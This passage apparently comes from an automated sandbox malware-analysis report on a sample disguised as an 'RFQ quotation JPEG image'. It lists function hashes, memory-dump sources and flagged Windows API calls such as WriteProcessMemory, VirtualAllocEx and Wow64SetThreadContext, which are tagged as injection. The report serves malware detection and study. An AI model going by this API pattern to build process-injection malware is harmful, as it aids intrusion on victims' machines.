                          • Opcode ID: 0919ed7b6fc0323b63727fcd3880473dc38e618a49db0fd9259fb42bdbbccb35
                          • Instruction ID: f8e02454395455f9fd34a2b8e8ab06666f91e8bb18605f826f9a21ff5b4f8c49
                          • Opcode Fuzzy Hash: 0919ed7b6fc0323b63727fcd3880473dc38e618a49db0fd9259fb42bdbbccb35
                          • Instruction Fuzzy Hash: 5CA11371D10219CFDB60CFA9C885BEEBBF2BF09310F14916AE958A7250DBB48985CF51
                          Function 064F2108 Relevance: 1.6, APIs: 1, Instructions: 128COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000000.00000002.2111848323.00000000064F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 064F0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_64f0000_RFQ____RM quotation_JPEG IMAGE.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 5dc347299d5dbeaaf51435b086974ae70012a51df389d1f55f8a92dd02ea794d
                          • Instruction ID: 672a7f525702b5759ef6b6f1418b74eacf3b60d6d63bdfc12e9e36fecce8b7ec
                          • Opcode Fuzzy Hash: 5dc347299d5dbeaaf51435b086974ae70012a51df389d1f55f8a92dd02ea794d
                          • Instruction Fuzzy Hash: 4E414371D152489FCB50DFE9D884AEEBFF0EF4A310F14802AE419BB251C779A945CB64
                          Function 064F2811 Relevance: 1.6, APIs: 1, Instructions: 119injectionCOMMON
                          Download Yara Rule
                          APIs
                          • WriteProcessMemory.KERNEL32(?,?,?,?,?), ref: 064F28EB
                          Memory Dump Source
                          • Source File: 00000000.00000002.2111848323.00000000064F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 064F0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_64f0000_RFQ____RM quotation_JPEG IMAGE.jbxd
                          Similarity
                          • API ID: MemoryProcessWrite
                          • String ID:
                          • API String ID: 3559483778-0
                          • Opcode ID: c15fbb0fbc8fb7366b26699f37e4e0c920d8044f8ae7a8f81c9ac3355ec064c5
                          • Instruction ID: 070c5d824c38419ae9ef368e09376bad27c8cf1548430422a28f458cead5e75f
                          • Opcode Fuzzy Hash: c15fbb0fbc8fb7366b26699f37e4e0c920d8044f8ae7a8f81c9ac3355ec064c5
                          • Instruction Fuzzy Hash: 8E41A8B5D012589FCF00CFA9D984AEEBBF1FB49310F24942AE818B7210D775AA45CB64
                          Function 064F2818 Relevance: 1.6, APIs: 1, Instructions: 116injectionCOMMON
                          Download Yara Rule
                          APIs
                          • WriteProcessMemory.KERNEL32(?,?,?,?,?), ref: 064F28EB
                          Memory Dump Source
                          • Source File: 00000000.00000002.2111848323.00000000064F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 064F0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_64f0000_RFQ____RM quotation_JPEG IMAGE.jbxd
                          Similarity
                          • API ID: MemoryProcessWrite
                          • String ID:
                          • API String ID: 3559483778-0
                          • Opcode ID: c962788416657350b84d0e584a3bb6b24c0c31c962e31fac46bcd895246343ab
                          • Instruction ID: ffb261b0ec5e361f0077c6787953fb3ee3bf74137e496d26246904778ddef7e7
                          • Opcode Fuzzy Hash: c962788416657350b84d0e584a3bb6b24c0c31c962e31fac46bcd895246343ab
                          • Instruction Fuzzy Hash: 924199B5D012589FCF00CFA9D984AEEFBF1BB49310F14942AE818B7210D775AA45CF64
                          Function 064F26B0 Relevance: 1.6, APIs: 1, Instructions: 105memoryCOMMON
                          Download Yara Rule
                          APIs
                          • VirtualAllocEx.KERNEL32(?,?,?,?,?), ref: 064F2762
                          Memory Dump Source
                          • Source File: 00000000.00000002.2111848323.00000000064F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 064F0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_64f0000_RFQ____RM quotation_JPEG IMAGE.jbxd
                          Similarity
                          • API ID: AllocVirtual
                          • String ID:
                          • API String ID: 4275171209-0
                          • Opcode ID: 84fc9bbaab38aaf3059e16fc8f293e1752defc88651ee5fc2a6c71451a23ec7c
                          • Instruction ID: 54dca2e2e3563dd827d837cde52e7c5ab154ef67d65142c11607de9e15c879d1
                          • Opcode Fuzzy Hash: 84fc9bbaab38aaf3059e16fc8f293e1752defc88651ee5fc2a6c71451a23ec7c
                          • Instruction Fuzzy Hash: 303198B9D002589FCF10CFA9D984A9EBBB5FB59310F10942AE815B7310D735A941CFA4
                          Function 064F2D00 Relevance: 1.6, APIs: 1, Instructions: 103memoryCOMMON
                          Download Yara Rule
                          APIs
                          • VirtualProtect.KERNELBASE(?,?,?,?), ref: 064F2DAC
                          Memory Dump Source
                          • Source File: 00000000.00000002.2111848323.00000000064F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 064F0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_64f0000_RFQ____RM quotation_JPEG IMAGE.jbxd
                          Similarity
                          • API ID: ProtectVirtual
                          • String ID:
                          • API String ID: 544645111-0
                          • Opcode ID: d03245073dfae60cb484c9daadd318246172cf6fca3ea7fa6ed14e8b9060abed
                          • Instruction ID: ec5cc29d1bd0ee87ff94b4658b31467753e3612f3e7c5caa4e380bf2558bcd82
                          • Opcode Fuzzy Hash: d03245073dfae60cb484c9daadd318246172cf6fca3ea7fa6ed14e8b9060abed
                          • Instruction Fuzzy Hash: B831DBB4D05258AFCB10CFA9D884AEEFBB0EF49310F14942AE814B7210C775AA45CFA4
                          Function 064F26B8 Relevance: 1.6, APIs: 1, Instructions: 101memoryCOMMON
                          Download Yara Rule
                          APIs
                          • VirtualAllocEx.KERNEL32(?,?,?,?,?), ref: 064F2762
                          Memory Dump Source
                          • Source File: 00000000.00000002.2111848323.00000000064F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 064F0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_64f0000_RFQ____RM quotation_JPEG IMAGE.jbxd
                          Similarity
                          • API ID: AllocVirtual
                          • String ID:
                          • API String ID: 4275171209-0
                          • Opcode ID: 4eacae57098009ddd66c5d336e7ef7760d88756b7f2b6594ed6d372380b050e8
                          • Instruction ID: ae7647ab3575632fb9444909c4fbd7e17bcf42d5be3d2a8a57bef9bd4319fdfa
                          • Opcode Fuzzy Hash: 4eacae57098009ddd66c5d336e7ef7760d88756b7f2b6594ed6d372380b050e8
                          • Instruction Fuzzy Hash: 5D31A6B9D002589FCF10CFA9D984A9EFBB5FB59320F10A42AE814B7310D735A941CFA4
                          Function 064F2D08 Relevance: 1.6, APIs: 1, Instructions: 98memoryCOMMON
                          Download Yara Rule
                          APIs
                          • VirtualProtect.KERNELBASE(?,?,?,?), ref: 064F2DAC
                          Memory Dump Source
                          • Source File: 00000000.00000002.2111848323.00000000064F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 064F0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_64f0000_RFQ____RM quotation_JPEG IMAGE.jbxd
                          Similarity
                          • API ID: ProtectVirtual
                          • String ID:
                          • API String ID: 544645111-0
                          • Opcode ID: 67234534e58e1eb0833a0d53766e2c5d9060cec11089429f0e21e86037f5eea9
                          • Instruction ID: 13b835a9de636b067d0a1a6486d91b00952ef31a98790645869d7853f25113ae
                          • Opcode Fuzzy Hash: 67234534e58e1eb0833a0d53766e2c5d9060cec11089429f0e21e86037f5eea9
                          • Instruction Fuzzy Hash: 4D31A8B9D042589FCF10CFA9D984AEEFBB1BF49310F14942AE814B7210D775AA45CFA4
                          Function 064F2150 Relevance: 1.6, APIs: 1, Instructions: 98threadCOMMON
                          Download Yara Rule
                          APIs
                          • Wow64SetThreadContext.KERNEL32(?,?), ref: 064F2207
                          Memory Dump Source
                          • Source File: 00000000.00000002.2111848323.00000000064F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 064F0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_64f0000_RFQ____RM quotation_JPEG IMAGE.jbxd
                          Similarity
                          • API ID: ContextThreadWow64
                          • String ID:
                          • API String ID: 983334009-0
                          • Opcode ID: f6e650e1889277066e795b0820ff20ebfe302627f2ac74337f39be56e0fb0ebd
                          • Instruction ID: c94aa1b2f602821e2259c0dd51b095fdecee41a5517d71d44bc27b4913fc3ddc
                          • Opcode Fuzzy Hash: f6e650e1889277066e795b0820ff20ebfe302627f2ac74337f39be56e0fb0ebd
                          • Instruction Fuzzy Hash: 5041CDB4D102589FDB10CFAAD984AEEBBF1FF49310F14802AE418B7240D7796A85CF64
                          Function 065CDAD0 Relevance: 1.6, APIs: 1, Instructions: 96memoryCOMMON
                          Download Yara Rule
                          APIs
                          • VirtualProtect.KERNEL32(?,?,?,?), ref: 065CDB74
                          Memory Dump Source
                          • Source File: 00000000.00000002.2112388205.00000000065C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 065C0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_65c0000_RFQ____RM quotation_JPEG IMAGE.jbxd
                          Similarity
                          • API ID: ProtectVirtual
                          • String ID:
                          • API String ID: 544645111-0
                          • Opcode ID: aa127ff01df222cffa167c45bb9659d011357b20fb08d389a380a09e4799e65c
                          • Instruction ID: 8029df25f6ca710d239a790808e60ab92dd003ccd72b6115727d4b3947082443
                          • Opcode Fuzzy Hash: aa127ff01df222cffa167c45bb9659d011357b20fb08d389a380a09e4799e65c
                          • Instruction Fuzzy Hash: A23186B9D002589FCB10CFA9D984A9EFBB5FF49320F14942AE818B7210D735A945CFA4
                          Function 064F2158 Relevance: 1.6, APIs: 1, Instructions: 94threadCOMMON
                          Download Yara Rule
                          APIs
                          • Wow64SetThreadContext.KERNEL32(?,?), ref: 064F2207
                          Memory Dump Source
                          • Source File: 00000000.00000002.2111848323.00000000064F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 064F0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_64f0000_RFQ____RM quotation_JPEG IMAGE.jbxd
                          Similarity
                          • API ID: ContextThreadWow64
                          • String ID:
                          • API String ID: 983334009-0
                          • Opcode ID: 84d5111c99379fecf4fab2ba3176e9699b595bfc6622f092b4485db904043a63
                          • Instruction ID: 692b09a164c57c7620abb399d318b8e1a429a9e3f0a1f51ca58e8351f0f80793
                          • Opcode Fuzzy Hash: 84d5111c99379fecf4fab2ba3176e9699b595bfc6622f092b4485db904043a63
                          • Instruction Fuzzy Hash: 0931BBB5D102589FDB10CFA9D984AEEBBF1FB49310F14842AE418B7240D779AA85CF64
                          Function 06549AB8 Relevance: 1.4, Strings: 1, Instructions: 173COMMON
                          Download Yara Rule
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2112090854.0000000006540000.00000040.00000800.00020000.00000000.sdmp, Offset: 06540000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_6540000_RFQ____RM quotation_JPEG IMAGE.jbxd
                          Similarity
                          • API ID:
                          • String ID: piq
                          • API String ID: 0-198074023
                          • Opcode ID: d984de19a140e76acc5115cc7f092652b8ce0733afb35bfcde402da48995befe
                          • Instruction ID: 990349b2b767f87c534952ad2a9637bbf9b111c8a735d90ccba501ece7c1b319
                          • Opcode Fuzzy Hash: d984de19a140e76acc5115cc7f092652b8ce0733afb35bfcde402da48995befe
                          • Instruction Fuzzy Hash: BB513C76600104AFCB4A9FA8C814D6A7FB6FF8D31471A84D9E249DB272DB32DC21DB51
                          Function 06549B40 Relevance: 1.4, Strings: 1, Instructions: 162COMMON
                          Download Yara Rule
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2112090854.0000000006540000.00000040.00000800.00020000.00000000.sdmp, Offset: 06540000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_6540000_RFQ____RM quotation_JPEG IMAGE.jbxd
                          Similarity
                          • API ID:
                          • String ID: piq
                          • API String ID: 0-198074023
                          • Opcode ID: 2c6aa92b2eda5ecff671204b61e1b78736645daaef84e0adeda4a12a647d1cdb
                          • Instruction ID: d07220a4ab3c679dd33cb98ca448877e48600539ccb3f7d71e2d8d87d1b07dd2
                          • Opcode Fuzzy Hash: 2c6aa92b2eda5ecff671204b61e1b78736645daaef84e0adeda4a12a647d1cdb
                          • Instruction Fuzzy Hash: 84513A76600110AFCB469FA8D805D6A7FB7FF8D31471A80D4E2099B272DB32DC21EB51
                          Function 0654AB10 Relevance: 1.4, Strings: 1, Instructions: 162COMMON
                          Download Yara Rule
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2112090854.0000000006540000.00000040.00000800.00020000.00000000.sdmp, Offset: 06540000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_6540000_RFQ____RM quotation_JPEG IMAGE.jbxd
                          Similarity
                          • API ID:
                          • String ID: (iq
                          • API String ID: 0-3943945277
                          • Opcode ID: dcb62ff47b7835d01caea578510719cca5438aa99f950b0341549818a3dc14ff
                          • Instruction ID: 208cbd2b0ce94c946a6746a23ad4a42e832f445e8a7c1a7c9a597437fcf2f0d9
                          • Opcode Fuzzy Hash: dcb62ff47b7835d01caea578510719cca5438aa99f950b0341549818a3dc14ff
                          • Instruction Fuzzy Hash: DD51F535A01616CFCB81DF58C884AAAFBB1FF85324B158699E5299B385D730FC51CBD0
                          Function 06501538 Relevance: 1.4, Strings: 1, Instructions: 157COMMON
                          Download Yara Rule
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2111899986.0000000006500000.00000040.00000800.00020000.00000000.sdmp, Offset: 06500000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_6500000_RFQ____RM quotation_JPEG IMAGE.jbxd
                          Similarity
                          • API ID:
                          • String ID: (iq
                          • API String ID: 0-3943945277
                          • Opcode ID: 3fdd324b017d017d8f6f83cca7ac48c769bf689b5f538194cab4cadec7c7227d
                          • Instruction ID: d2e3997a3c549d27c10542a2f8bcc45ef700eed21d29a409f22962a3de152514
                          • Opcode Fuzzy Hash: 3fdd324b017d017d8f6f83cca7ac48c769bf689b5f538194cab4cadec7c7227d
                          • Instruction Fuzzy Hash: 1E51A336604254AFCB069F68D804D697FB6FF8931071980D6E245CF272CA32DC11DB61
                          Function 01410A47 Relevance: 1.4, Strings: 1, Instructions: 150COMMON
                          Download Yara Rule
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2087204893.0000000001410000.00000040.00000800.00020000.00000000.sdmp, Offset: 01410000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_1410000_RFQ____RM quotation_JPEG IMAGE.jbxd
                          Similarity
                          • API ID:
                          • String ID: \seq
                          • API String ID: 0-3382732615
                          • Opcode ID: 40711c5613561f0f39e9910b02e90c9f534c5ade1853e1547de913259468beef
                          • Instruction ID: 765ea044d84cd5b16240ea74de27144faa268f8b97d257bac111a3079bca351b
                          • Opcode Fuzzy Hash: 40711c5613561f0f39e9910b02e90c9f534c5ade1853e1547de913259468beef
                          • Instruction Fuzzy Hash: 3D5139B9D0021A9FDF04CFA9D8806EEBBB1BF88310F10A559D411EB265DB359941CF54
                          Function 065004E8 Relevance: 1.4, Strings: 1, Instructions: 134COMMON
                          Download Yara Rule
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2111899986.0000000006500000.00000040.00000800.00020000.00000000.sdmp, Offset: 06500000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_6500000_RFQ____RM quotation_JPEG IMAGE.jbxd
                          Similarity
                          • API ID:
                          • String ID: 4'eq
                          • API String ID: 0-1552367303
                          • Opcode ID: 6cc1937a709f57060356893b4923f554041b1b222365ced579a9ee5853d0ef2c
                          • Instruction ID: f621f9446498f849b0e5c0fb6071619ceec287e24e418a5e5a8413d2abe469d2
                          • Opcode Fuzzy Hash: 6cc1937a709f57060356893b4923f554041b1b222365ced579a9ee5853d0ef2c
                          • Instruction Fuzzy Hash: 40419334B106288FDB84EB68D854A6EB7B7AFC9700F104529D516AB3D4CF749C46CBE1
                          Function 014107D8 Relevance: 1.4, Strings: 1, Instructions: 128COMMON
                          Download Yara Rule
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2087204893.0000000001410000.00000040.00000800.00020000.00000000.sdmp, Offset: 01410000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_1410000_RFQ____RM quotation_JPEG IMAGE.jbxd
                          Similarity
                          • API ID:
                          • String ID: <d|q
                          • API String ID: 0-1894747305
                          • Opcode ID: 08cba75d687b114b2fec0cffc7b137a894295141fd794dd2655488afd9cd5011
                          • Instruction ID: 6723495c301ef9f6ae203029f592bc040742e8696a7c00ef2aeeecc6028caaff
                          • Opcode Fuzzy Hash: 08cba75d687b114b2fec0cffc7b137a894295141fd794dd2655488afd9cd5011
                          • Instruction Fuzzy Hash: 88418A719092948FDB02CF68C4A4AD9BFF1AF4A310B1980D7D480EB2B7D7349C85CBA5
                          Function 06549BB8 Relevance: 1.4, Strings: 1, Instructions: 119COMMON
                          Download Yara Rule
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2112090854.0000000006540000.00000040.00000800.00020000.00000000.sdmp, Offset: 06540000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_6540000_RFQ____RM quotation_JPEG IMAGE.jbxd
                          Similarity
                          • API ID:
                          • String ID: piq
                          • API String ID: 0-198074023
                          • Opcode ID: 2a8833394ae2b2e760c7a8d1ce86dba5d3864715a9a93f35b672f86a0e1a671e
                          • Instruction ID: 72436ba09747d47112c29223db9826bb9a1466bba7e7b40d8c426d4e3731031f
                          • Opcode Fuzzy Hash: 2a8833394ae2b2e760c7a8d1ce86dba5d3864715a9a93f35b672f86a0e1a671e
                          • Instruction Fuzzy Hash: B441C976600110AFCB469F99D944D6A7BB7FF8C31471A8094E2099B372DB32DC21EB50
                          Function 01410868 Relevance: 1.4, Strings: 1, Instructions: 112COMMON
                          Download Yara Rule
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2087204893.0000000001410000.00000040.00000800.00020000.00000000.sdmp, Offset: 01410000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_1410000_RFQ____RM quotation_JPEG IMAGE.jbxd
                          Similarity
                          • API ID:
                          • String ID: <d|q
                          • API String ID: 0-1894747305
                          • Opcode ID: f2f693c3ac623f84689b629c26b184ffeda34f519fdcf518892b4d5b389daaf1
                          • Instruction ID: b907818c0eee565c2c801c850355c8f61b73641cf82998799ee4cb40e9cb276c
                          • Opcode Fuzzy Hash: f2f693c3ac623f84689b629c26b184ffeda34f519fdcf518892b4d5b389daaf1
                          • Instruction Fuzzy Hash: B241F775A101188FDB04DFA9C594AADBBF2FF8C310B1584A6E509EB365D735EC41CB90
                          Function 0684FD38 Relevance: 1.4, Strings: 1, Instructions: 109COMMON
                          Download Yara Rule
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2112820848.0000000006830000.00000040.00000800.00020000.00000000.sdmp, Offset: 06830000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_6830000_RFQ____RM quotation_JPEG IMAGE.jbxd
                          Similarity
                          • API ID:
                          • String ID: 4'eq
                          • API String ID: 0-1552367303
                          • Opcode ID: a3cf99f1d3048f1df2169fcb1300db17ad26f928d46c227b06b8a1d4978caac7
                          • Instruction ID: e0a869560ce90ab083256b0ada087e182e0dbcbbeeebb9cae3263df175c1e368
                          • Opcode Fuzzy Hash: a3cf99f1d3048f1df2169fcb1300db17ad26f928d46c227b06b8a1d4978caac7
                          • Instruction Fuzzy Hash: AE314A757006149FD348EB69D859B2A77EAEFC8704F204468E606CB3E2CE75EC42C791
                          Function 0654A400 Relevance: 1.3, Strings: 1, Instructions: 95COMMON
                          Download Yara Rule
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2112090854.0000000006540000.00000040.00000800.00020000.00000000.sdmp, Offset: 06540000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_6540000_RFQ____RM quotation_JPEG IMAGE.jbxd
                          Similarity
                          • API ID:
                          • String ID: (iq
                          • API String ID: 0-3943945277
                          • Opcode ID: 31ac520b2b5a80295b3a92cafab28bc6cb4ee95e5a3b52fced6d6ced69500150
                          • Instruction ID: a11f83e7a36b3246ac12094e0d35436497210160d796ff398d59ce1c4e8644f5
                          • Opcode Fuzzy Hash: 31ac520b2b5a80295b3a92cafab28bc6cb4ee95e5a3b52fced6d6ced69500150
                          • Instruction Fuzzy Hash: BD213635704151AFDB05AF69E8449AE7FA6EFC9360B14407EE908CB354CE358C05C7A0
                          Function 065004D9 Relevance: 1.3, Strings: 1, Instructions: 94COMMON
                          Download Yara Rule
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2111899986.0000000006500000.00000040.00000800.00020000.00000000.sdmp, Offset: 06500000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_6500000_RFQ____RM quotation_JPEG IMAGE.jbxd
                          Similarity
                          • API ID:
                          • String ID: 4'eq
                          • API String ID: 0-1552367303
                          • Opcode ID: 42e85e0b93f7df82d606ddc3257a314b91bc830ac866e52f26516cae1ccca9d1
                          • Instruction ID: c96223e0920f43a8fc8541dd52f84af3382922e1aa9b73a8a75a8addd678f4fc
                          • Opcode Fuzzy Hash: 42e85e0b93f7df82d606ddc3257a314b91bc830ac866e52f26516cae1ccca9d1
                          • Instruction Fuzzy Hash: 32219830B102249BDB599B64D85967EB6ABEFC9600F10402DE516DB3D4CE749C42CBE5
                          Function 065CEC98 Relevance: 1.3, APIs: 1, Instructions: 94memoryCOMMON
                          Download Yara Rule
                          APIs
                          • VirtualAlloc.KERNEL32(?,?,?,?), ref: 065CED37
                          Memory Dump Source
                          • Source File: 00000000.00000002.2112388205.00000000065C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 065C0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_65c0000_RFQ____RM quotation_JPEG IMAGE.jbxd
                          Similarity
                          • API ID: AllocVirtual
                          • String ID:
                          • API String ID: 4275171209-0
                          • Opcode ID: 56ff706a2a06b645eb93c1f7c571e06071d1b19778e14f6d6fb415edde8bae93
                          • Instruction ID: a586a268dff5a433f833345865e46acb343a59316aba1f4cae4b19e71b8350a9
                          • Opcode Fuzzy Hash: 56ff706a2a06b645eb93c1f7c571e06071d1b19778e14f6d6fb415edde8bae93
                          • Instruction Fuzzy Hash: CF3198B9D002589FCF10CFA9D984A9EFBB5FF49320F14942AE815B7210D735A945CFA4
                          Function 056E0D7B Relevance: 1.3, Strings: 1, Instructions: 80COMMON
                          Download Yara Rule
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2109782239.00000000056E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 056E0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_56e0000_RFQ____RM quotation_JPEG IMAGE.jbxd
                          Similarity
                          • API ID:
                          • String ID: 4'eq
                          • API String ID: 0-1552367303
                          • Opcode ID: c9bd5521a47ccaf223024bc53b1295b720547f7c4f5daba9114e05afe7bc9954
                          • Instruction ID: 79b06626713258a4e1062d90a2fcbb6def9236135c7707ea304ccf5428af4681
                          • Opcode Fuzzy Hash: c9bd5521a47ccaf223024bc53b1295b720547f7c4f5daba9114e05afe7bc9954
                          • Instruction Fuzzy Hash: 12314974D06219CFDB18CFA9D848AFEBBB2FF45311F10806AD412AB290C7745A4ACF91
                          Function 01410857 Relevance: 1.3, Strings: 1, Instructions: 80COMMON
                          Download Yara Rule
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2087204893.0000000001410000.00000040.00000800.00020000.00000000.sdmp, Offset: 01410000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_1410000_RFQ____RM quotation_JPEG IMAGE.jbxd
                          Similarity
                          • API ID:
                          • String ID: <d|q
                          • API String ID: 0-1894747305
                          • Opcode ID: 2de5f38e75ee9e678878e6946a884bd4784e478fc5a7db6a2015f138be30ad17
                          • Instruction ID: 926f2d725d296da540ad449d75cabc936db20f2db8174918b690d7624df97f9a
                          • Opcode Fuzzy Hash: 2de5f38e75ee9e678878e6946a884bd4784e478fc5a7db6a2015f138be30ad17
                          • Instruction Fuzzy Hash: DC31A071A00619CFDB04CFA8C585AADBBF2BF48310F298596E509EB265D735ED81CB90
                          Function 01411F48 Relevance: 1.3, Strings: 1, Instructions: 79COMMON
                          Download Yara Rule
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2087204893.0000000001410000.00000040.00000800.00020000.00000000.sdmp, Offset: 01410000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_1410000_RFQ____RM quotation_JPEG IMAGE.jbxd
                          Similarity
                          • API ID:
                          • String ID: \seq
                          • API String ID: 0-3382732615
                          • Opcode ID: d7d82bf20a51408e1368f64e24e11e1512a8f97cafa843f2238e8568a292f340
                          • Instruction ID: 5e9749f62fb68a97565daaa8bf0f0a188b8acc4611ae58d27c70cf0dce25aa99
                          • Opcode Fuzzy Hash: d7d82bf20a51408e1368f64e24e11e1512a8f97cafa843f2238e8568a292f340
                          • Instruction Fuzzy Hash: 4221AE323101208FC755DBBDD85492A7BF9EF89A5431684AAF20ACB376DB21DC018B90
                          Function 0654E332 Relevance: 1.3, Strings: 1, Instructions: 78COMMON
                          Download Yara Rule
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2112090854.0000000006540000.00000040.00000800.00020000.00000000.sdmp, Offset: 06540000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_6540000_RFQ____RM quotation_JPEG IMAGE.jbxd
                          Similarity
                          • API ID:
                          • String ID: p<eq
                          • API String ID: 0-1484963132
                          • Opcode ID: 9d5ef1222ed03b30886539528d02abeb3a98007624ac75a6504a98f5e586a468
                          • Instruction ID: 792cd00dca58bf616b2b343c85faf8ecdb5bcfbed28975743b3d0519d628b11d
                          • Opcode Fuzzy Hash: 9d5ef1222ed03b30886539528d02abeb3a98007624ac75a6504a98f5e586a468
                          • Instruction Fuzzy Hash: 0C216231704294AFDB56DF6AC850EAA7BE5BF8A244B098096FC55CB371C635EC50CB60
                          Function 065427B9 Relevance: 1.3, Strings: 1, Instructions: 29COMMON
                          Download Yara Rule
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2112090854.0000000006540000.00000040.00000800.00020000.00000000.sdmp, Offset: 06540000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_6540000_RFQ____RM quotation_JPEG IMAGE.jbxd
                          Similarity
                          • API ID:
                          • String ID: Q
                          • API String ID: 0-3463352047
                          • Opcode ID: 2cb3e0f1036bcd83918a3b1ad499247c5b4dba12bd579b6455774026c87dc797
                          • Instruction ID: b9d264e072e121c25aa29c513d5a5175150997659dba2b9f523d5634d510c9df
                          • Opcode Fuzzy Hash: 2cb3e0f1036bcd83918a3b1ad499247c5b4dba12bd579b6455774026c87dc797
                          • Instruction Fuzzy Hash: A8014C74E112288FDBA6DF18D844799BBF9BB49315F1090E9A54EA2240DBB05FC4CF01
                          Function 0650D4DE Relevance: 1.3, Strings: 1, Instructions: 29COMMON
                          Download Yara Rule
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2111899986.0000000006500000.00000040.00000800.00020000.00000000.sdmp, Offset: 06500000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_6500000_RFQ____RM quotation_JPEG IMAGE.jbxd
                          Similarity
                          • API ID:
                          • String ID: }q&1
                          • API String ID: 0-2132944420
                          • Opcode ID: f365a80d69187d98a1803c7d725f8cc6e6b4af74f11161a86e8b9222ec7d9ee5
                          • Instruction ID: 6e949f80027134649016b20feed92e93b118a9f0ae434dbbf763878d3dda4129
                          • Opcode Fuzzy Hash: f365a80d69187d98a1803c7d725f8cc6e6b4af74f11161a86e8b9222ec7d9ee5
                          • Instruction Fuzzy Hash: C80131347003149FE794DF28E955B6973B6FF8A300F5086A5D40A9B354DB749D85CF41
                          Function 0650D618 Relevance: 1.3, Strings: 1, Instructions: 27COMMON
                          Download Yara Rule
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2111899986.0000000006500000.00000040.00000800.00020000.00000000.sdmp, Offset: 06500000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_6500000_RFQ____RM quotation_JPEG IMAGE.jbxd
                          Similarity
                          • API ID:
                          • String ID: #
                          • API String ID: 0-1885708031
                          • Opcode ID: f786cb328b01dd3e7daab04af4ba91311cae3269274fb6607783c32b2d8a9a14
                          • Instruction ID: a755d528f0c06726ac56004a5473795bc0a5add0593caee90da16b1af6fec274
                          • Opcode Fuzzy Hash: f786cb328b01dd3e7daab04af4ba91311cae3269274fb6607783c32b2d8a9a14
                          • Instruction Fuzzy Hash: 8EF04930B01208AFDB84DF68E599AAD77F6FF49300F904539E016AB654DBB46C41CF00
                          Function 0654735D Relevance: 1.3, Strings: 1, Instructions: 20COMMON
                          Download Yara Rule
                          Strings
                          Memory Dump Source
